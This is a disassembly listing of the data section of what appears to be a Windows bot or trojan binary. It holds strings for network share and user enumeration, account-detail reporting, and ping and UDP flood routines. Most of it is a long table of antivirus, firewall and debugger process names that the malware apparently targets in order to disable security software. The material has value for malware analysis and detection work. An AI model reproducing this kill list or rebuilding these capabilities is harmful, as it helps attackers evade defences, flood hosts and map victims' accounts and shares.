; char aNetSShareS_[]
aNetSShareS_ db '[NET]: %s share: ',27h,'%s',27h,'.',0 ; DATA XREF: sub_4077B6+89�o
align 4
; char aNetSErrorWithS[]
aNetSErrorWithS db '[NET]: %s: Error with share: ',27h,'%s',27h,'. %s',0
; DATA XREF: sub_4077B6+57�o
align 4
; char a14s24s6u4s[]
a14s24s6u4s db '%-14S %-24S %-6u %-4s',0 ; DATA XREF: sub_407944+D0�o
align 4
aNo db 'No',0 ; DATA XREF: sub_407944+BC�o
align 10h
aYes db 'Yes',0 ; DATA XREF: sub_407944+B5�o
; char aNetShareListEr[]
aNetShareListEr db '[NET]: Share list error: %s <%ld>',0 ; DATA XREF: sub_407944+76�o
align 4
aShareNameResou db 'Share name: Resource: Uses: Desc:',0
; DATA XREF: sub_407944+26�o
align 10h
; char aNetSNoUsername[]
aNetSNoUsername db '[NET]: %s: No username specified.',0 ; DATA XREF: sub_407A65+B6�o
align 4
; char aNetSErrorWithU[]
aNetSErrorWithU db '[NET]: %s: Error with username: ',27h,'%s',27h,'. %s',0
; DATA XREF: sub_407A65+94�o
align 10h
; char aNetSUsernameS_[]
aNetSUsernameS_ db '[NET]: %s username: ',27h,'%s',27h,'.',0 ; DATA XREF: sub_407A65+6D�o
align 4
; char aNetUserInfoErr[]
aNetUserInfoErr db '[NET]: User info error: <%ld>',0 ; DATA XREF: sub_407BAB+394�o
align 4
; char aUnitsPerWeekD[]
aUnitsPerWeekD db 'Units Per Week: %d',0 ; DATA XREF: sub_407BAB+36A�o
align 10h
; char aMax_StorageD[]
aMax_StorageD db 'Max. Storage: %d',0 ; DATA XREF: sub_407BAB+33F�o
align 4
; char aUserSLanguageD[]
aUserSLanguageD db 'User',27h,'s Language: %d',0 ; DATA XREF: sub_407BAB+317�o
; char aCountryCodeD[]
aCountryCodeD db 'Country Code: %d',0 ; DATA XREF: sub_407BAB+2EC�o
align 4
; char aWorkstationsS[]
aWorkstationsS db 'Workstations: %S',0 ; DATA XREF: sub_407BAB+2C4�o
align 10h
; char aLogonServerS[]
aLogonServerS db 'Logon Server: %S',0 ; DATA XREF: sub_407BAB+299�o
align 4
; char aLastLogoffD[]
aLastLogoffD db 'Last Logoff: %d',0 ; DATA XREF: sub_407BAB+271�o
; char aLastLogonD[]
aLastLogonD db 'Last Logon: %d',0 ; DATA XREF: sub_407BAB+246�o
align 4
; char aNumberOfLogins[]
aNumberOfLogins db 'Number of Logins: %d',0 ; DATA XREF: sub_407BAB+21E�o
align 4
; char aBadPasswordCou[]
aBadPasswordCou db 'Bad Password Count: %d',0 ; DATA XREF: sub_407BAB+1F3�o
align 4
; char aPasswordAgeD[]
aPasswordAgeD db 'Password Age: %d',0 ; DATA XREF: sub_407BAB+1CB�o
align 4
; char aParametersS[]
aParametersS db 'Parameters: %S',0 ; DATA XREF: sub_407BAB+1A0�o
align 4
; char aHomeDirectoryS[]
aHomeDirectoryS db 'Home Directory: %S',0 ; DATA XREF: sub_407BAB+178�o
align 4
; char aAuthFlagsD[]
aAuthFlagsD db 'Auth Flags: %d',0 ; DATA XREF: sub_407BAB+14D�o
align 4
; char aPrivilegeLevel[]
aPrivilegeLevel db 'Privilege Level: %s',0 ; DATA XREF: sub_407BAB+125�o
aGuest db 'Guest',0 ; DATA XREF: sub_407BAB:loc_407CC4�o
align 4
aUser_0 db 'User',0 ; DATA XREF: sub_407BAB:loc_407CBD�o
align 10h
aAdministrator db 'Administrator',0 ; DATA XREF: sub_407BAB:loc_407CB6�o
align 10h
; char aCommentS[]
aCommentS db 'Comment: %S',0 ; DATA XREF: sub_407BAB+D4�o
; char aUserCommentS[]
aUserCommentS db 'User Comment: %S',0 ; DATA XREF: sub_407BAB+AC�o
align 10h
; char aFullNameS[]
aFullNameS db 'Full Name: %S',0 ; DATA XREF: sub_407BAB+81�o
align 10h
; char aAccountS[]
aAccountS db 'Account: %S',0 ; DATA XREF: sub_407BAB+50�o
; char aTotalUsersFoun[]
aTotalUsersFoun db 'Total users found: %d.',0 ; DATA XREF: sub_407F79+14F�o
align 4
; char aNetAnAccessVio[]
aNetAnAccessVio db '[NET]: An access violation has occured.',0 ; DATA XREF: sub_407F79+F7�o
; char aS_4[]
aS_4 db ' %S',0 ; DATA XREF: sub_407F79+BE�o
align 4
; char aNetUserListErr[]
aNetUserListErr db '[NET]: User list error: %s <%ld>',0 ; DATA XREF: sub_407F79+7A�o
align 4
aUsernameAccoun db 'Username accounts for local system:',0 ; DATA XREF: sub_407F79+29�o
; char aNetworkConnect[]
aNetworkConnect db 'Network connection not found.',0 ; DATA XREF: sub_4080F9:loc_408216�o
align 4
aTheUserNameCou db 'The user name could not be found.',0 ; DATA XREF: sub_4080F9:loc_40820F�o
align 10h
aShareNotFound_ db 'Share not found.',0 ; DATA XREF: sub_4080F9:loc_408208�o
align 4
aTheComputerNam db 'The computer name is invalid.',0 ; DATA XREF: sub_4080F9:loc_408201�o
align 4
aAnUnknownError db 'An unknown error occurred.',0 ; DATA XREF: sub_4080F9:loc_4081FA�o
align 10h
aThePasswordIsS db 'The password is shorter than required (or does not meet the passw'
; DATA XREF: sub_4080F9:loc_4081DD�o
db 'ord policy requirement.)',0
align 4
aTheGroupAlread db 'The group already exists.',0 ; DATA XREF: sub_4080F9:loc_4081D6�o
align 4
aTheUserAccount db 'The user account already exists.',0 ; DATA XREF: sub_4080F9:loc_4081CF�o
align 4
aTheOperationIs db 'The operation is allowed only on the primary domain controller of'
; DATA XREF: sub_4080F9+CF�o
db ' the domain.',0
align 4
aAGeneralFailur db 'A general failure occurred in the network hardware.',0
; DATA XREF: sub_4080F9:loc_4081A4�o
aLevelParameter db 'Level parameter is invalid.',0 ; DATA XREF: sub_4080F9:loc_40819D�o
aDeviceOrDirect db 'Device or directory does not exist.',0
; DATA XREF: sub_4080F9:loc_408196�o
aInvalidForRedi db 'Invalid for redirected resource.',0 ; DATA XREF: sub_4080F9:loc_40818C�o
align 4
aDuplicateShare db 'Duplicate share name.',0 ; DATA XREF: sub_4080F9+89�o
align 4
aTheNameIsInval db 'The name is invalid.',0 ; DATA XREF: sub_4080F9:loc_408166�o
align 4
aAccessDenied_ db 'Access denied.',0 ; DATA XREF: sub_4080F9:loc_40815C�o
align 4
aNotEnoughMemor db 'Not enough memory.',0 ; DATA XREF: sub_4080F9:loc_408152�o
align 4
aThisNetworkReq db 'This network request is not supported.',0
; DATA XREF: sub_4080F9:loc_408148�o
align 10h
aServerNameNotF db 'Server name not found.',0 ; DATA XREF: sub_4080F9:loc_40813E�o
align 4
aInvalidParamet db 'Invalid parameter.',0 ; DATA XREF: sub_4080F9+3B�o
align 4
; char aNetSServerSMes[]
aNetSServerSMes db '[NET]: %s <Server: %S> <Message: %S>',0 ; DATA XREF: sub_40822D+AB�o
align 4
; char aNetMessageSent[]
aNetMessageSent db '[NET]: Message sent successfully.',0 ; DATA XREF: sub_40822D+81�o
align 4
aFlushdnsNotSup db '[FLUSHDNS]: Not supported by this system.',0
; DATA XREF: sub_408323:loc_4083E2�o
align 4
; char aFlushdnsUnable[]
aFlushdnsUnable db '[FLUSHDNS]: Unable to allocation ARP cache.',0
; DATA XREF: sub_408323:loc_4083B0�o
aFlushdnsArpCac db '[FLUSHDNS]: ARP cache is empty.',0 ; DATA XREF: sub_408323:loc_40837C�o
; char aFlushdnsErrorG[]
aFlushdnsErrorG db '[FLUSHDNS]: Error getting ARP cache: <%d>.',0
; DATA XREF: sub_408323+49�o
align 4
; char aPingFinishedSe[]
aPingFinishedSe db '[PING]: Finished sending pings to %s.',0 ; DATA XREF: sub_4084A7+13C�o
align 4
; char aPingErrorSendi[]
aPingErrorSendi db '[PING]: Error sending pings to %s.',0 ; DATA XREF: sub_4084A7+6E�o
align 4
; char aUdpFinishedSen[]
aUdpFinishedSen db '[UDP]: Finished sending packets to %s.',0 ; DATA XREF: sub_408633+1C6�o
align 10h
; char aUdpErrorSendin[]
aUdpErrorSendin db '[UDP]: Error sending pings to %s.',0 ; DATA XREF: sub_408633+8E�o
align 4
dword_421F04 dd 7530h ; DATA XREF: sub_408BF8+12�r
off_421F08 dd offset aAckwin32_exe ; DATA XREF: sub_4088B4+CB�o
; "ACKWIN32.EXE"
dd offset aAdaware_exe ; "ADAWARE.EXE"
dd offset aAdvxdwin_exe ; "ADVXDWIN.EXE"
dd offset aAgentsvr_exe ; "AGENTSVR.EXE"
dd offset aAgentw_exe ; "AGENTW.EXE"
dd offset aAlertsvc_exe ; "ALERTSVC.EXE"
dd offset aAlevir_exe ; "ALEVIR.EXE"
dd offset aAlogserv_exe ; "ALOGSERV.EXE"
dd offset aAmon9x_exe ; "AMON9X.EXE"
dd offset aAntiTrojan_exe ; "ANTI-TROJAN.EXE"
dd offset aAntivirus_exe ; "ANTIVIRUS.EXE"
dd offset aAnts_exe ; "ANTS.EXE"
dd offset aApimonitor_exe ; "APIMONITOR.EXE"
dd offset aAplica32_exe ; "APLICA32.EXE"
dd offset aApvxdwin_exe ; "APVXDWIN.EXE"
dd offset aArr_exe ; "ARR.EXE"
dd offset aAtcon_exe ; "ATCON.EXE"
dd offset aAtguard_exe ; "ATGUARD.EXE"
dd offset aAtro55en_exe ; "ATRO55EN.EXE"
dd offset aAtupdater_exe ; "ATUPDATER.EXE"
dd offset aAtupdater_exe ; "ATUPDATER.EXE"
dd offset aAtwatch_exe ; "ATWATCH.EXE"
dd offset aAu_exe ; "AU.EXE"
dd offset aAupdate_exe ; "AUPDATE.EXE"
dd offset aAupdate_exe ; "AUPDATE.EXE"
dd offset aAutodown_exe ; "AUTODOWN.EXE"
dd offset aAutodown_exe ; "AUTODOWN.EXE"
dd offset aAutotrace_exe ; "AUTOTRACE.EXE"
dd offset aAutotrace_exe ; "AUTOTRACE.EXE"
dd offset aAutoupdate_exe ; "AUTOUPDATE.EXE"
dd offset aAutoupdate_exe ; "AUTOUPDATE.EXE"
dd offset aAvconsol_exe ; "AVCONSOL.EXE"
dd offset aAve32_exe ; "AVE32.EXE"
dd offset aAvgcc32_exe ; "AVGCC32.EXE"
dd offset aAvgctrl_exe ; "AVGCTRL.EXE"
dd offset aAvgnt_exe ; "AVGNT.EXE"
dd offset aAvgserv_exe ; "AVGSERV.EXE"
dd offset aAvgserv9_exe ; "AVGSERV9.EXE"
dd offset aAvguard_exe ; "AVGUARD.EXE"
dd offset aAvgw_exe ; "AVGW.EXE"
dd offset aAvkpop_exe ; "AVKPOP.EXE"
dd offset aAvkserv_exe ; "AVKSERV.EXE"
dd offset aAvkservice_exe ; "AVKSERVICE.EXE"
dd offset aAvkwctl9_exe ; "AVKWCTl9.EXE"
dd offset aAvltmain_exe ; "AVLTMAIN.EXE"
dd offset aAvnt_exe ; "AVNT.EXE"
dd offset aAvp_exe ; "AVP.EXE"
dd offset aAvp32_exe ; "AVP32.EXE"
dd offset aAvpcc_exe ; "AVPCC.EXE"
dd offset aAvpdos32_exe ; "AVPDOS32.EXE"
dd offset aAvpm_exe ; "AVPM.EXE"
dd offset aAvptc32_exe ; "AVPTC32.EXE"
dd offset aAvpupd_exe ; "AVPUPD.EXE"
dd offset aAvpupd_exe ; "AVPUPD.EXE"
dd offset aAvsched32_exe ; "AVSCHED32.EXE"
dd offset aAvsynmgr_exe ; "AVSYNMGR.EXE"
dd offset aAvwin95_exe ; "AVWIN95.EXE"
dd offset aAvwinnt_exe ; "AVWINNT.EXE"
dd offset aAvwupd_exe ; "AVWUPD.EXE"
dd offset aAvwupd32_exe ; "AVWUPD32.EXE"
dd offset aAvwupd32_exe ; "AVWUPD32.EXE"
dd offset aAvwupsrv_exe ; "AVWUPSRV.EXE"
dd offset aAvxmonitor9x_e ; "AVXMONITOR9X.EXE"
dd offset aAvxmonitornt_e ; "AVXMONITORNT.EXE"
dd offset aAvxquar_exe ; "AVXQUAR.EXE"
dd offset aAvxquar_exe ; "AVXQUAR.EXE"
dd offset aBackweb_exe ; "BACKWEB.EXE"
dd offset aBargains_exe ; "BARGAINS.EXE"
dd offset aBd_professiona ; "BD_PROFESSIONAL.EXE"
dd offset aBeagle_exe ; "BEAGLE.EXE"
dd offset aBelt_exe ; "BELT.EXE"
dd offset aBidef_exe ; "BIDEF.EXE"
dd offset aBidserver_exe ; "BIDSERVER.EXE"
dd offset aBipcp_exe ; "BIPCP.EXE"
dd offset aBipcpevalsetup ; "BIPCPEVALSETUP.EXE"
dd offset aBisp_exe ; "BISP.EXE"
dd offset aBlackd_exe ; "BLACKD.EXE"
dd offset aBlackice_exe ; "BLACKICE.EXE"
dd offset aBlss_exe ; "BLSS.EXE"
dd offset aBootconf_exe ; "BOOTCONF.EXE"
dd offset aBootwarn_exe ; "BOOTWARN.EXE"
dd offset aBorg2_exe ; "BORG2.EXE"
dd offset aBpc_exe ; "BPC.EXE"
dd offset aBrasil_exe ; "BRASIL.EXE"
dd offset aBs120_exe ; "BS120.EXE"
dd offset aBundle_exe ; "BUNDLE.EXE"
dd offset aBvt_exe ; "BVT.EXE"
dd offset aCcapp_exe ; "CCAPP.EXE"
dd offset aCcevtmgr_exe ; "CCEVTMGR.EXE"
dd offset aCcpxysvc_exe ; "CCPXYSVC.EXE"
dd offset aCdp_exe ; "CDP.EXE"
dd offset aCfd_exe ; "CFD.EXE"
dd offset aCfgwiz_exe ; "CFGWIZ.EXE"
dd offset aCfiadmin_exe ; "CFIADMIN.EXE"
dd offset aCfiaudit_exe ; "CFIAUDIT.EXE"
dd offset aCfiaudit_exe ; "CFIAUDIT.EXE"
dd offset aCfinet_exe ; "CFINET.EXE"
dd offset aCfinet32_exe ; "CFINET32.EXE"
dd offset aClaw95cf_exe ; "CLAW95CF.EXE"
dd offset aClean_exe ; "CLEAN.EXE"
dd offset aCleaner_exe ; "CLEANER.EXE"
dd offset aCleaner3_exe ; "CLEANER3.EXE"
dd offset aCleanpc_exe ; "CLEANPC.EXE"
dd offset aClick_exe ; "CLICK.EXE"
dd offset aCmd32_exe ; "CMD32.EXE"
dd offset aCmesys_exe ; "CMESYS.EXE"
dd offset aCmgrdian_exe ; "CMGRDIAN.EXE"
dd offset aCmon016_exe ; "CMON016.EXE"
dd offset aConnectionmoni ; "CONNECTIONMONITOR.EXE"
dd offset aCpd_exe ; "CPD.EXE"
dd offset aCpf9x206_exe ; "CPF9X206.EXE"
dd offset aCpfnt206_exe ; "CPFNT206.EXE"
dd offset aCtrl_exe ; "CTRL.EXE"
dd offset aCv_exe ; "CV.EXE"
dd offset aCwnb181_exe ; "CWNB181.EXE"
dd offset aCwntdwmo_exe ; "CWNTDWMO.EXE"
dd offset aClaw95_exe ; "Claw95.EXE"
dd offset aClaw95cf_exe ; "CLAW95CF.EXE"
dd offset aDatemanager_ex ; "DATEMANAGER.EXE"
dd offset aDcomx_exe ; "DCOMX.EXE"
dd offset aDefalert_exe ; "DEFALERT.EXE"
dd offset aDefscangui_exe ; "DEFSCANGUI.EXE"
dd offset aDefwatch_exe ; "DEFWATCH.EXE"
dd offset aDeputy_exe ; "DEPUTY.EXE"
dd offset aDivx_exe ; "DIVX.EXE"
dd offset aDllcache_exe ; "DLLCACHE.EXE"
dd offset aDllreg_exe ; "DLLREG.EXE"
dd offset aDoors_exe ; "DOORS.EXE"
dd offset aDpf_exe ; "DPF.EXE"
dd offset aDpfsetup_exe ; "DPFSETUP.EXE"
dd offset aDpps2_exe ; "DPPS2.EXE"
dd offset aDrwatson_exe ; "DRWATSON.EXE"
dd offset aDrweb32_exe ; "DRWEB32.EXE"
dd offset aDrwebupw_exe ; "DRWEBUPW.EXE"
dd offset aDssagent_exe ; "DSSAGENT.EXE"
dd offset aDvp95_exe ; "DVP95.EXE"
dd offset aDvp95_0_exe ; "DVP95_0.EXE"
dd offset aEcengine_exe ; "ECENGINE.EXE"
dd offset aEfpeadm_exe ; "EFPEADM.EXE"
dd offset aEmsw_exe ; "EMSW.EXE"
dd offset aEnt_exe ; "ENT.EXE"
dd offset aEsafe_exe ; "ESAFE.EXE"
dd offset aEscanh95_exe ; "ESCANH95.EXE"
dd offset aEscanhnt_exe ; "ESCANHNT.EXE"
dd offset aEscanv95_exe ; "ESCANV95.EXE"
dd offset aEspwatch_exe ; "ESPWATCH.EXE"
dd offset aEthereal_exe ; "ETHEREAL.EXE"
dd offset aEtrustcipe_exe ; "ETRUSTCIPE.EXE"
dd offset aEvpn_exe ; "EVPN.EXE"
dd offset aExantivirusCne ; "EXANTIVIRUS-CNET.EXE"
dd offset aExe_avxw_exe ; "EXE.AVXW.EXE"
dd offset aExpert_exe ; "EXPERT.EXE"
dd offset aExplore_exe ; "EXPLORE.EXE"
dd offset aFAgnt95_exe ; "F-AGNT95.EXE"
dd offset aFProt_exe ; "F-PROT.EXE"
dd offset aFProt95_exe ; "F-PROT95.EXE"
dd offset aFStopw_exe ; "F-STOPW.EXE"
dd offset aFameh32_exe ; "FAMEH32.EXE"
dd offset aFast_exe ; "FAST.EXE"
dd offset aFch32_exe ; "FCH32.EXE"
dd offset aFih32_exe ; "FIH32.EXE"
dd offset aFindviru_exe ; "FINDVIRU.EXE"
dd offset aFirewall_exe ; "FIREWALL.EXE"
dd offset aFlowprotector_ ; "FLOWPROTECTOR.EXE"
dd offset aFnrb32_exe ; "FNRB32.EXE"
dd offset aFpWin_exe ; "FP-WIN.EXE"
dd offset aFpWin_trial_ex ; "FP-WIN_TRIAL.EXE"
dd offset aFprot_exe ; "FPROT.EXE"
dd offset aFrw_exe ; "FRW.EXE"
dd offset aFsaa_exe ; "FSAA.EXE"
dd offset aFsav_exe ; "FSAV.EXE"
dd offset aFsav32_exe ; "FSAV32.EXE"
dd offset aFsav530stbyb_e ; "FSAV530STBYB.EXE"
dd offset aFsav530wtbyb_e ; "FSAV530WTBYB.EXE"
dd offset aFsav95_exe ; "FSAV95.EXE"
dd offset aFsgk32_exe ; "FSGK32.EXE"
dd offset aFsm32_exe ; "FSM32.EXE"
dd offset aFsma32_exe ; "FSMA32.EXE"
dd offset aFsmb32_exe ; "FSMB32.EXE"
dd offset aGator_exe ; "GATOR.EXE"
dd offset aGbmenu_exe ; "GBMENU.EXE"
dd offset aGbpoll_exe ; "GBPOLL.EXE"
dd offset aGenerics_exe ; "GENERICS.EXE"
dd offset aGmt_exe ; "GMT.EXE"
dd offset aGuard_exe ; "GUARD.EXE"
dd offset aGuarddog_exe ; "GUARDDOG.EXE"
dd offset aHacktracersetu ; "HACKTRACERSETUP.EXE"
dd offset aHbinst_exe ; "HBINST.EXE"
dd offset aHbsrv_exe ; "HBSRV.EXE"
dd offset aHotactio_exe ; "HOTACTIO.EXE"
dd offset aHotpatch_exe ; "HOTPATCH.EXE"
dd offset aHtlog_exe ; "HTLOG.EXE"
dd offset aHtpatch_exe ; "HTPATCH.EXE"
dd offset aHwpe_exe ; "HWPE.EXE"
dd offset aHxdl_exe ; "HXDL.EXE"
dd offset aHxiul_exe ; "HXIUL.EXE"
dd offset aIamapp_exe ; "IAMAPP.EXE"
dd offset aIamserv_exe ; "IAMSERV.EXE"
dd offset aIamstats_exe ; "IAMSTATS.EXE"
dd offset aIbmasn_exe ; "IBMASN.EXE"
dd offset aIbmavsp_exe ; "IBMAVSP.EXE"
dd offset aIcload95_exe ; "ICLOAD95.EXE"
dd offset aIcloadnt_exe ; "ICLOADNT.EXE"
dd offset aIcmon_exe ; "ICMON.EXE"
dd offset aIcsupp95_exe ; "ICSUPP95.EXE"
dd offset aIcsupp95_exe ; "ICSUPP95.EXE"
dd offset aIcsuppnt_exe ; "ICSUPPNT.EXE"
dd offset aIdle_exe ; "IDLE.EXE"
dd offset aIedll_exe ; "IEDLL.EXE"
dd offset aIedriver_exe ; "IEDRIVER.EXE"
dd offset aIexplorer_exe ; "IEXPLORER.EXE"
dd offset aIface_exe ; "IFACE.EXE"
dd offset aIfw2000_exe ; "IFW2000.EXE"
dd offset aInetlnfo_exe ; "INETLNFO.EXE"
dd offset aInfus_exe ; "INFUS.EXE"
dd offset aInfwin_exe ; "INFWIN.EXE"
dd offset aInit_exe ; "INIT.EXE"
dd offset aIntdel_exe ; "INTDEL.EXE"
dd offset aIntren_exe ; "INTREN.EXE"
dd offset aIomon98_exe ; "IOMON98.EXE"
dd offset aIparmor_exe ; "IPARMOR.EXE"
dd offset aIris_exe ; "IRIS.EXE"
dd offset aIsass_exe ; "ISASS.EXE"
dd offset aIsrv95_exe ; "ISRV95.EXE"
dd offset aIstsvc_exe ; "ISTSVC.EXE"
dd offset aJammer_exe ; "JAMMER.EXE"
dd offset aJdbgmrg_exe ; "JDBGMRG.EXE"
dd offset aJedi_exe ; "JEDI.EXE"
dd offset aKavlite40eng_e ; "KAVLITE40ENG.EXE"
dd offset aKavpers40eng_e ; "KAVPERS40ENG.EXE"
dd offset aKavpf_exe ; "KAVPF.EXE"
dd offset aKazza_exe ; "KAZZA.EXE"
dd offset aKeenvalue_exe ; "KEENVALUE.EXE"
dd offset aKerioPf213EnWi ; "KERIO-PF-213-EN-WIN.EXE"
dd offset aKerioWrl421EnW ; "KERIO-WRL-421-EN-WIN.EXE"
dd offset aKerioWrp421EnW ; "KERIO-WRP-421-EN-WIN.EXE"
dd offset aKernel32_exe ; "KERNEL32.EXE"
dd offset aKillprocessset ; "KILLPROCESSSETUP161.EXE"
dd offset aLauncher_exe ; "LAUNCHER.EXE"
dd offset aLdnetmon_exe ; "LDNETMON.EXE"
dd offset aLdpro_exe ; "LDPRO.EXE"
dd offset aLdpromenu_exe ; "LDPROMENU.EXE"
dd offset aLdscan_exe ; "LDSCAN.EXE"
dd offset aLnetinfo_exe ; "LNETINFO.EXE"
dd offset aLoader_exe ; "LOADER.EXE"
dd offset aLocalnet_exe ; "LOCALNET.EXE"
dd offset aLockdown_exe ; "LOCKDOWN.EXE"
dd offset aLockdown2000_e ; "LOCKDOWN2000.EXE"
dd offset aLookout_exe ; "LOOKOUT.EXE"
dd offset aLordpe_exe ; "LORDPE.EXE"
dd offset aLsetup_exe ; "LSETUP.EXE"
dd offset aLuall_exe ; "LUALL.EXE"
dd offset aLuall_exe ; "LUALL.EXE"
dd offset aLuau_exe ; "LUAU.EXE"
dd offset aLucomserver_ex ; "LUCOMSERVER.EXE"
dd offset aLuinit_exe ; "LUINIT.EXE"
dd offset aLuspt_exe ; "LUSPT.EXE"
dd offset aMapisvc32_exe ; "MAPISVC32.EXE"
dd offset aMcagent_exe ; "MCAGENT.EXE"
dd offset aMcmnhdlr_exe ; "MCMNHDLR.EXE"
dd offset aMcshield_exe ; "MCSHIELD.EXE"
dd offset aMctool_exe ; "MCTOOL.EXE"
dd offset aMcupdate_exe ; "MCUPDATE.EXE"
dd offset aMcupdate_exe ; "MCUPDATE.EXE"
dd offset aMcvsrte_exe ; "MCVSRTE.EXE"
dd offset aMcvsshld_exe ; "MCVSSHLD.EXE"
dd offset aMd_exe ; "MD.EXE"
dd offset aMfin32_exe ; "MFIN32.EXE"
dd offset aMfw2en_exe ; "MFW2EN.EXE"
dd offset aMfweng3_02d30_ ; "MFWENG3.02D30.EXE"
dd offset aMgavrtcl_exe ; "MGAVRTCL.EXE"
dd offset aMgavrte_exe ; "MGAVRTE.EXE"
dd offset aMghtml_exe ; "MGHTML.EXE"
dd offset aMgui_exe ; "MGUI.EXE"
dd offset aMinilog_exe ; "MINILOG.EXE"
dd offset aMmod_exe ; "MMOD.EXE"
dd offset aMonitor_exe ; "MONITOR.EXE"
dd offset aMoolive_exe ; "MOOLIVE.EXE"
dd offset aMostat_exe ; "MOSTAT.EXE"
dd offset aMpfagent_exe ; "MPFAGENT.EXE"
dd offset aMpfservice_exe ; "MPFSERVICE.EXE"
dd offset aMpftray_exe ; "MPFTRAY.EXE"
dd offset aMrflux_exe ; "MRFLUX.EXE"
dd offset aMsapp_exe ; "MSAPP.EXE"
dd offset aMsbb_exe ; "MSBB.EXE"
dd offset aMsblast_exe ; "MSBLAST.EXE"
dd offset aMscache_exe ; "MSCACHE.EXE"
dd offset aMsccn32_exe ; "MSCCN32.EXE"
dd offset aMscman_exe ; "MSCMAN.EXE"
dd offset aMsconfig_exe ; "MSCONFIG.EXE"
dd offset aMsdm_exe ; "MSDM.EXE"
dd offset aMsdos_exe ; "MSDOS.EXE"
dd offset aMsiexec16_exe ; "MSIEXEC16.EXE"
dd offset aMsinfo32_exe ; "MSINFO32.EXE"
dd offset aMslaugh_exe ; "MSLAUGH.EXE"
dd offset aMsmgt_exe ; "MSMGT.EXE"
dd offset aMsmsgri32_exe ; "MSMSGRI32.EXE"
dd offset aMssmmc32_exe ; "MSSMMC32.EXE"
dd offset aMssys_exe ; "MSSYS.EXE"
dd offset aMsvxd_exe ; "MSVXD.EXE"
dd offset aMu0311ad_exe ; "MU0311AD.EXE"
dd offset aMwatch_exe ; "MWATCH.EXE"
dd offset aN32scanw_exe ; "N32SCANW.EXE"
dd offset aNav_exe ; "NAV.EXE"
dd offset aAutoProtect_na ; "AUTO-PROTECT.NAV80TRY.EXE"
dd offset aNavap_navapsvc ; "NAVAP.NAVAPSVC.EXE"
dd offset aNavapsvc_exe ; "NAVAPSVC.EXE"
dd offset aNavapw32_exe ; "NAVAPW32.EXE"
dd offset aNavdx_exe ; "NAVDX.EXE"
dd offset aNavengnavex15_ ; "NAVENGNAVEX15.NAVLU32.EXE"
dd offset aNavlu32_exe ; "NAVLU32.EXE"
dd offset aNavnt_exe ; "NAVNT.EXE"
dd offset aNavstub_exe ; "NAVSTUB.EXE"
dd offset aNavw32_exe ; "NAVW32.EXE"
dd offset aNavwnt_exe ; "NAVWNT.EXE"
dd offset aNc2000_exe ; "NC2000.EXE"
dd offset aNcinst4_exe ; "NCINST4.EXE"
dd offset aNdd32_exe ; "NDD32.EXE"
dd offset aNeomonitor_exe ; "NEOMONITOR.EXE"
dd offset aNeowatchlog_ex ; "NEOWATCHLOG.EXE"
dd offset aNetarmor_exe ; "NETARMOR.EXE"
dd offset aNetd32_exe ; "NETD32.EXE"
dd offset aNetinfo_exe ; "NETINFO.EXE"
dd offset aNetmon_exe ; "NETMON.EXE"
dd offset aNetscanpro_exe ; "NETSCANPRO.EXE"
dd offset aNetspyhunter1_ ; "NETSPYHUNTER-1.2.EXE"
dd offset aNetstat_exe ; "NETSTAT.EXE"
dd offset aNetutils_exe ; "NETUTILS.EXE"
dd offset aNisserv_exe ; "NISSERV.EXE"
dd offset aNisum_exe ; "NISUM.EXE"
dd offset aNmain_exe ; "NMAIN.EXE"
dd offset aNod32_exe ; "NOD32.EXE"
dd offset aNormist_exe ; "NORMIST.EXE"
dd offset aNorton_interne ; "NORTON_INTERNET_SECU_3.0_407.EXE"
dd offset aNotstart_exe ; "NOTSTART.EXE"
dd offset aNpf40_tw_98_nt ; "NPF40_TW_98_NT_ME_2K.EXE"
dd offset aNpfmessenger_e ; "NPFMESSENGER.EXE"
dd offset aNprotect_exe ; "NPROTECT.EXE"
dd offset aNpscheck_exe ; "NPSCHECK.EXE"
dd offset aNpssvc_exe ; "NPSSVC.EXE"
dd offset aNsched32_exe ; "NSCHED32.EXE"
dd offset aNssys32_exe ; "NSSYS32.EXE"
dd offset aNstask32_exe ; "NSTASK32.EXE"
dd offset aNsupdate_exe ; "NSUPDATE.EXE"
dd offset aNt_exe ; "NT.EXE"
dd offset aNtrtscan_exe ; "NTRTSCAN.EXE"
dd offset aNtvdm_exe ; "NTVDM.EXE"
dd offset aNtxconfig_exe ; "NTXconfig.EXE"
dd offset aNui_exe ; "NUI.EXE"
dd offset aNupgrade_exe ; "NUPGRADE.EXE"
dd offset aNupgrade_exe ; "NUPGRADE.EXE"
dd offset aNvarch16_exe ; "NVARCH16.EXE"
dd offset aNvc95_exe ; "NVC95.EXE"
dd offset aNvsvc32_exe ; "NVSVC32.EXE"
dd offset aNwinst4_exe ; "NWINST4.EXE"
dd offset aNwservice_exe ; "NWSERVICE.EXE"
dd offset aNwtool16_exe ; "NWTOOL16.EXE"
dd offset aOllydbg_exe ; "OLLYDBG.EXE"
dd offset aOnsrvr_exe ; "ONSRVR.EXE"
dd offset aOptimize_exe ; "OPTIMIZE.EXE"
dd offset aOstronet_exe ; "OSTRONET.EXE"
dd offset aOtfix_exe ; "OTFIX.EXE"
dd offset aOutpost_exe ; "OUTPOST.EXE"
dd offset aOutpost_exe ; "OUTPOST.EXE"
dd offset aOutpostinstall ; "OUTPOSTINSTALL.EXE"
dd offset aOutpostproinst ; "OUTPOSTPROINSTALL.EXE"
dd offset aPadmin_exe ; "PADMIN.EXE"
dd offset aPanixk_exe ; "PANIXK.EXE"
dd offset aPatch_exe ; "PATCH.EXE"
dd offset aPavcl_exe ; "PAVCL.EXE"
dd offset aPavproxy_exe ; "PAVPROXY.EXE"
dd offset aPavsched_exe ; "PAVSCHED.EXE"
dd offset aPavw_exe ; "PAVW.EXE"
dd offset aPcc2002s902_ex ; "PCC2002S902.EXE"
dd offset aPcc2k_76_1436_ ; "PCC2K_76_1436.EXE"
dd offset aPcciomon_exe ; "PCCIOMON.EXE"
dd offset aPccntmon_exe ; "PCCNTMON.EXE"
dd offset aPccwin97_exe ; "PCCWIN97.EXE"
dd offset aPccwin98_exe ; "PCCWIN98.EXE"
dd offset aPcdsetup_exe ; "PCDSETUP.EXE"
dd offset aPcfwallicon_ex ; "PCFWALLICON.EXE"
dd offset aPcip10117_0_ex ; "PCIP10117_0.EXE"
dd offset aPcscan_exe ; "PCSCAN.EXE"
dd offset aPdsetup_exe ; "PDSETUP.EXE"
dd offset aPenis_exe ; "PENIS.EXE"
dd offset aPeriscope_exe ; "PERISCOPE.EXE"
dd offset aPersfw_exe ; "PERSFW.EXE"
dd offset aPerswf_exe ; "PERSWF.EXE"
dd offset aPf2_exe ; "PF2.EXE"
dd offset aPfwadmin_exe ; "PFWADMIN.EXE"
dd offset aPgmonitr_exe ; "PGMONITR.EXE"
